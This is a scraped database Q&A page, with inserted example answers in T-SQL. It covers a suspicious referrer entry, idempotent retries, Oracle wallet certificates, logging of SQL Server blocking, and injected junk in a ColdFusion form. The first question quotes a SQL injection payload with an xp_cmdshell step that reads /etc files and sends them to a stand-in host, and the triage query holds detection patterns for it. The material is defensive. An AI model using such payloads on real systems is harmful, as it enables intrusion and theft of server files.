How can I check if this code has done harm? - database

While monitoring visitors to my website, I noticed this code in the referrer column:
alert("XSS")',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc%'>https://example.com/?display=1') AND 1=1 UNION A.......
I am new to this, as it has never happened before, but it is obviously to do with the database. The strange thing is that the IP address belongs to Microsoft: 20.94.192.0
Please, how can I determine if I have been hacked, or the database has been compromised, somehow? I would greatly appreciate your help.
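As an added example, not part of the question or any answer on this page: the string above only proves that a scanner sent that payload to the web server; whether anything reached the database is a separate question. The xp_cmdshell in it is aimed at SQL Server, so, assuming that is the backend, the T-SQL below does a first triage. It assumes the web access log has been loaded into a table (here a constructed table variable @referrers with a few made-up rows, the last of them the fragment from the question); all object names are illustrative, and the DMV query needs VIEW SERVER STATE.

```sql
-- Constructed sample of referrer values; the third row is the fragment from the question.
DECLARE @referrers TABLE (
    id        int IDENTITY(1,1),
    seen_at   datetime2,
    client_ip varchar(45),
    referrer  nvarchar(max));
INSERT INTO @referrers (seen_at, client_ip, referrer) VALUES
    ('2024-01-01 10:00:00', '198.51.100.7', N'https://www.google.com/'),
    ('2024-01-01 10:00:05', '198.51.100.7', N'https://example.org/page?id=12'),
    ('2024-01-01 10:01:00', '20.94.192.0',  N'alert("XSS")'',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell(''cat ../../../etc%''>https://example.com/?display=1'') AND 1=1 UNION A');

-- 1. Flag rows carrying SQL injection or XSS markers. Underscore is a LIKE wildcard,
--    so it is written as [_]; matching is case-insensitive under a CI collation.
SELECT id, seen_at, client_ip, LEFT(referrer, 120) AS referrer_excerpt,
       CASE WHEN referrer LIKE '%xp[_]cmdshell%'        THEN 'xp_cmdshell '        ELSE '' END
     + CASE WHEN referrer LIKE '%information[_]schema%' THEN 'information_schema ' ELSE '' END
     + CASE WHEN referrer LIKE '%union%select%'         THEN 'union_select '       ELSE '' END
     + CASE WHEN referrer LIKE '%--%' OR referrer LIKE '%/*%' THEN 'sql_comment ' ELSE '' END
     + CASE WHEN referrer LIKE '%<script%' OR referrer LIKE '%alert(%' THEN 'xss ' ELSE '' END
       AS indicators
FROM @referrers
WHERE referrer LIKE '%xp[_]cmdshell%' OR referrer LIKE '%information[_]schema%'
   OR referrer LIKE '%union%select%'
   OR referrer LIKE '%--%' OR referrer LIKE '%/*%'
   OR referrer LIKE '%<script%' OR referrer LIKE '%alert(%';

-- 2. Did anyone manage to turn xp_cmdshell on? It is off by default; value_in_use = 1 means enabled.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';

-- 3. Is there cached statement text that references xp_cmdshell or information_schema.tables?
--    Only covers plans still in cache since the last restart, so a clean result is not proof of absence.
SELECT TOP (50) qs.last_execution_time, qs.execution_count, st.text
FROM sys.dm_exec_query_stats AS qs
CROSS APPLY sys.dm_exec_sql_text(qs.sql_handle) AS st
WHERE st.text LIKE '%xp[_]cmdshell%' OR st.text LIKE '%information[_]schema.tables%'
ORDER BY qs.last_execution_time DESC;
```

The first query is a blunt pattern match and will produce false positives on ordinary URLs containing "--"; treat it as a list of requests to read, not as verdicts. The second and third are the checks that actually distinguish "someone tried" from "someone got code execution": xp_cmdshell being enabled when nobody enabled it, or cached statements that your application never issues. Whichever cloud range the scanner came from says only where it was hosted, not who ran it.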

Related

Any solution to know whether a non-idempotent query is complete in a database or storage system when met with a connection timeout or closed connection?

We are developing a SQL database, and the client connects to the server with RPC.
Think about a case: there are Transaction_A (TxnA) and Transaction_B (TxnB). TxnA may be something like UPDATE tbl SET a=a+1 WHERE id=1.
When the client gets a CONN_TIMEOUT exception, the reason might be a server crash or network issues. Therefore, TxnA may or may not have completed its write. Meanwhile, TxnB may write to the same table and update the table metadata (like advancing the sequence number or revision).
So it seems there is no way for the client to check whether TxnA completed or not. And the query may not be idempotent, such as the 'UPDATE a=a+1' example above, so it cannot be retried recklessly.
My question: is there any solution to this issue? I'm not sure how other SQL systems or storage systems deal with it. I tried googling some keywords, but failed to get answers.
Thank you for any inspiration.
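As an added example, not part of the question above: the usual answer to this problem is an idempotency key. The client generates a request id once and keeps it across retries, and the server records that id in the same transaction as the non-idempotent write, so either both the row change and the id are durable or neither is. After a timeout the client can either look the id up or simply retry with the same id, and a second attempt is a no-op. Table metadata such as a revision counter is not needed for this, so TxnB cannot confuse the check. It is written in T-SQL for SQL Server purely as an illustration; table, column and procedure names are made up.

```sql
-- Schema (illustrative names)
CREATE TABLE dbo.tbl (id int PRIMARY KEY, a int NOT NULL);
CREATE TABLE dbo.completed_request (
    request_id   uniqueidentifier NOT NULL PRIMARY KEY,
    completed_at datetime2        NOT NULL DEFAULT SYSUTCDATETIME());
INSERT INTO dbo.tbl (id, a) VALUES (1, 0);
GO

-- Server side: the non-idempotent write and the request id commit together or not at all.
CREATE PROCEDURE dbo.increment_a @request_id uniqueidentifier, @id int
AS
BEGIN
    SET NOCOUNT ON;
    SET XACT_ABORT ON;      -- any error rolls the whole transaction back
    BEGIN TRANSACTION;
    -- UPDLOCK + HOLDLOCK takes a key-range lock on the (still absent) request id, so two
    -- concurrent retries with the same id serialize here instead of both passing the check.
    IF NOT EXISTS (SELECT 1 FROM dbo.completed_request WITH (UPDLOCK, HOLDLOCK)
                   WHERE request_id = @request_id)
    BEGIN
        UPDATE dbo.tbl SET a = a + 1 WHERE id = @id;
        INSERT INTO dbo.completed_request (request_id) VALUES (@request_id);
    END
    COMMIT TRANSACTION;
END
GO

-- Client side: generate the id once, then reuse it for every retry after CONN_TIMEOUT.
DECLARE @txnA uniqueidentifier = NEWID();
EXEC dbo.increment_a @request_id = @txnA, @id = 1;   -- first attempt; suppose the ack was lost
EXEC dbo.increment_a @request_id = @txnA, @id = 1;   -- blind retry: no-op, a stays 1

-- TxnB is a different request with its own id and must still take effect.
DECLARE @txnB uniqueidentifier = NEWID();
EXEC dbo.increment_a @request_id = @txnB, @id = 1;   -- a becomes 2

-- After a timeout the client can also ask directly whether TxnA landed.
SELECT CASE WHEN EXISTS (SELECT 1 FROM dbo.completed_request WHERE request_id = @txnA)
            THEN 'committed' ELSE 'not applied' END AS txnA_state;
SELECT id, a FROM dbo.tbl WHERE id = 1;   -- a = 2
```

Two caveats a practitioner would add. "Not applied" is only final if the original attempt can no longer commit; a request still crawling through a slow network could land after the lookup, so the safe action is always to retry with the same id rather than to issue a fresh write. And the completed_request table grows with every request, so it needs a retention window longer than the longest retry any client will attempt.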

How do I include a CA certificate trusted by Gmail into an Oracle Wallet?

Right now I'm working with Oracle 11g on Windows and currently trying to send notifications from my database using email (Gmail). All I'm clear on right now is that I have to include the Gmail certificate in the Oracle wallet, but I don't know how to do it. I also think that there's something to be done with the access control lists, but I'm not completely sure how. Any help or recommendations are enormously appreciated.
Back up the Oracle wallet files first. To get the wallet file locations, run:
SELECT * FROM V$ENCRYPTION_WALLET
Then look at the orapki utility to get you started - search for this and you should find the Oracle documentation.
The following is how to add a certificate to the wallet:
orapki wallet add -wallet wallet_location -trusted_cert -cert certificate_location
For any Windows users who may need help with what I asked, there's a really good link/tutorial sort of instruction set on git:
https://github.com/YairPR/Oracle/wiki/Enviar-correo-con-Oracle:--ACL---UTL_SMTP---Wallet---SSL--TLS----Gmail
It's in Spanish, but all the commands and steps are there, although you may just happen to need to translate it. Hope it's useful for someone!

Block in SQL Server (SP_WHO2)

I have a problem at the company I work for: some people are using SQL in the wrong way, causing blocks that naturally crash the whole system, but we are not able to catch who is doing this, because by the time we notice it, the person has already ended the process.
I wonder if there is any way to save the data from the blocks?
As soon as something happens, it would save data such as SPID, Login, HostName, DBName and Command, and of course, if possible, pull and save the script that the guy is running. I usually see it through:
dbcc inputbuffer (SPID)
I already searched Google and did not find it, so I came here.
Thanks in advance.
PS: Sorry for the English from Google Translate
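As an added example, not one of the answers on this page: everything dbcc inputbuffer and sp_who2 show on demand can be captured automatically from the DMVs they are built on. The T-SQL below creates a log table and a capture statement meant to be run every few seconds from a SQL Server Agent job; the table name and the 5-second threshold are illustrative, and the statement needs VIEW SERVER STATE. The important detail is that the blocker is usually idle with an open transaction, so it does not appear in sys.dm_exec_requests at all; its last statement is fetched through sys.dm_exec_connections.most_recent_sql_handle, which is what DBCC INPUTBUFFER would have shown.

```sql
CREATE TABLE dbo.BlockingLog (
    captured_at        datetime2     NOT NULL DEFAULT SYSUTCDATETIME(),
    blocked_spid       int           NOT NULL,
    blocked_login      sysname       NOT NULL,
    blocked_host       sysname       NULL,
    blocked_db         sysname       NULL,
    blocked_command    nvarchar(32)  NULL,
    wait_type          nvarchar(60)  NULL,
    wait_time_ms       int           NULL,
    blocked_sql        nvarchar(max) NULL,
    blocking_spid      int           NOT NULL,
    blocking_login     sysname       NULL,
    blocking_host      sysname       NULL,
    blocking_status    nvarchar(30)  NULL,  -- 'sleeping' with an open transaction is the classic offender
    blocking_open_tran int           NULL,
    blocking_sql       nvarchar(max) NULL
);
GO

-- Capture step: run from an Agent job on a short schedule (e.g. every 10 seconds).
INSERT INTO dbo.BlockingLog (blocked_spid, blocked_login, blocked_host, blocked_db, blocked_command,
                             wait_type, wait_time_ms, blocked_sql,
                             blocking_spid, blocking_login, blocking_host, blocking_status,
                             blocking_open_tran, blocking_sql)
SELECT  r.session_id, s.login_name, s.host_name, DB_NAME(r.database_id), r.command,
        r.wait_type, r.wait_time, bt.text,
        r.blocking_session_id, bs.login_name, bs.host_name, bs.status,
        bs.open_transaction_count, ht.text
FROM    sys.dm_exec_requests    AS r
JOIN    sys.dm_exec_sessions    AS s  ON s.session_id  = r.session_id
LEFT JOIN sys.dm_exec_sessions  AS bs ON bs.session_id = r.blocking_session_id
-- one row per connection; a MARS session can have several, which would duplicate the victim row
LEFT JOIN sys.dm_exec_connections AS bc ON bc.session_id = r.blocking_session_id
OUTER APPLY sys.dm_exec_sql_text(r.sql_handle)              AS bt   -- the victim's statement
OUTER APPLY sys.dm_exec_sql_text(bc.most_recent_sql_handle) AS ht   -- the blocker's last statement
WHERE   r.blocking_session_id <> 0
  AND   r.wait_time > 5000;          -- ignore sub-5-second blocking noise
GO

-- Reporting: who sat at the head of the blocking chains in the last hour, and for how long?
SELECT blocking_spid, blocking_login, blocking_host, blocking_status,
       COUNT(*)                      AS samples_as_blocker,
       MAX(wait_time_ms)             AS longest_victim_wait_ms,
       MAX(LEFT(blocking_sql, 4000)) AS last_statement
FROM dbo.BlockingLog
WHERE captured_at > DATEADD(hour, -1, SYSUTCDATETIME())
GROUP BY blocking_spid, blocking_login, blocking_host, blocking_status
ORDER BY longest_victim_wait_ms DESC;
```

Polling will miss blocking shorter than the interval; if that matters, the blocked process report Extended Event fires on the server side instead, but the columns it gives you are the same ones this table records. Note that most_recent_sql_handle is the last batch the blocker sent, which is not necessarily the statement that took the lock if the transaction was opened several batches earlier.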

SQL Server Data has script tags in a Memo Field with Intranet IP Address

We have a ColdFusion page where admins can insert/update some real estate records after logging in. We are noticing that in one table's Memo field called 'description', there are sometimes tags containing hacking/junk info. I have introduced Captcha. The page is password protected and not linked from any pages, so it is not accessible by search engines unless someone gave out the URL accidentally. We are now also tracking the IP address of the person who is doing the inserts/updates. But still, we just saw that all the data in the description field had [junk text] appended to the end of the valid text, with an internal IP address of 192.168.0.101. This IP is someone's personal computer. One of our theories is that the person's computer is compromised. But what kind of virus would do that? Also, what I would like to do is to have a field called 'approved' which is 'no' by default, but any time an Insert/Update happens it goes to 'no' and 'triggers' an email to admins about the change. What could be the syntax of that inside SSMS? Thanks!
The most likely cause is SQL injection. It could be that your internal PC is compromised by malware or a virus that is attacking your site using one of many dozen attacks. The most common of them do exactly what you are describing: append content to the end of text or character fields in the DB. Here's a description of one common attack that does just that.
I would also check the following:
Make sure handler scripts are "locked down" too, not just root URLs. Sometimes a script you include is accessible via URL and is used in hacking attempts.
Look for old code elsewhere in your site that might not be password protected. If you have a legacy code base, chances are there's some old code lying about that needs clean up :)
Look in the web logs for URL params with values that begin with EXEC( - this is a common approach to injection.
Scan the PC in question rigorously. Install Charles or Wireshark and watch HTTP traffic to see what's going on.
Finally, check all your code for vulnerability to SQLi. Make sure all your variables use cfqueryparam and you have other controls in place. Passwords are not the only level of protection you need :)
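As an added example, not part of the question or the answer above, here is the 'approved' flag and notification trigger the question asks for, in T-SQL as you would run it in SSMS. The table and column names (dbo.Listings, listing_id, description, approved), the Database Mail profile 'Alerts' and the recipient address are assumptions; Database Mail must already be configured. The trigger is only a tripwire for the symptom. It does nothing against the injection itself, which is what cfqueryparam in the ColdFusion code is for.

```sql
-- Add the flag: every new or changed row starts out unapproved.
ALTER TABLE dbo.Listings ADD approved char(3) NOT NULL
    CONSTRAINT DF_Listings_approved DEFAULT ('no')
    CONSTRAINT CK_Listings_approved CHECK (approved IN ('yes', 'no'));
GO

CREATE TRIGGER dbo.trg_Listings_FlagForReview
ON dbo.Listings
AFTER INSERT, UPDATE
AS
BEGIN
    SET NOCOUNT ON;

    -- An admin approving a row changes only 'approved'; do not flip that back to 'no'.
    -- For inserts, UPDATE(col) is true for every column, so inserts always fall through.
    IF UPDATE(approved) AND NOT UPDATE(description) RETURN;

    -- Set-based: 'inserted' may hold many rows. Recursive triggers are off by default,
    -- so this UPDATE of the same table does not re-fire the trigger.
    UPDATE l SET approved = 'no'
    FROM dbo.Listings AS l
    JOIN inserted AS i ON i.listing_id = l.listing_id;

    -- One line per changed row; the FOR XML PATH trick concatenates across rows.
    DECLARE @body nvarchar(max) =
        (SELECT N'Listing ' + CAST(i.listing_id AS nvarchar(20))
              + N' changed by login ' + SUSER_SNAME()
              + N'. Description now: ' + LEFT(ISNULL(i.description, N''), 200) + NCHAR(10)
         FROM inserted AS i
         FOR XML PATH(''), TYPE).value('.', 'nvarchar(max)');

    -- Queues the message; Database Mail delivers it asynchronously, so the DML is not held up by SMTP.
    EXEC msdb.dbo.sp_send_dbmail
        @profile_name = 'Alerts',
        @recipients   = 'admins@example.com',
        @subject      = 'Listing change awaiting approval',
        @body         = @body;
END
GO
```

Two things to adjust for your site. SUSER_SNAME() inside the trigger is the SQL login the ColdFusion application connects with, not the person at the keyboard, so the per-row client IP you already record is the value worth putting in the mail body (its column name is not given in the question, so it is not included above). And the UPDATE(approved) guard assumes the approval screen touches only that column; if it re-saves every field, scope the test to the columns that screen actually writes, or the approval will re-flag the row.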

What does xp_qv do in SQL Server?

Last night one of our SQL servers developed some major problems and after a colleague stopped, started, and all the usual things it started checking and rebuilding databases and is now running an extended stored procedure called "xp_qv".
The internet seems to be very short of information on what this procedure does or anything like that, so I was hoping somebody here might be able to help.
I should add that I assume it is meant to be running, so the question isn't "Can I stop it" or anything like that; it's just curiosity about what it is doing, in the hope that it will help determine how long before things are usable again...
This is the only information I could find:
xp_qv, hosted in xpsqlbot.dll, is a wrapper around functionality in sqlboot.dll, which returns information about the SKU type, licensing etc. It is not documented; that is why you cannot find a reference.
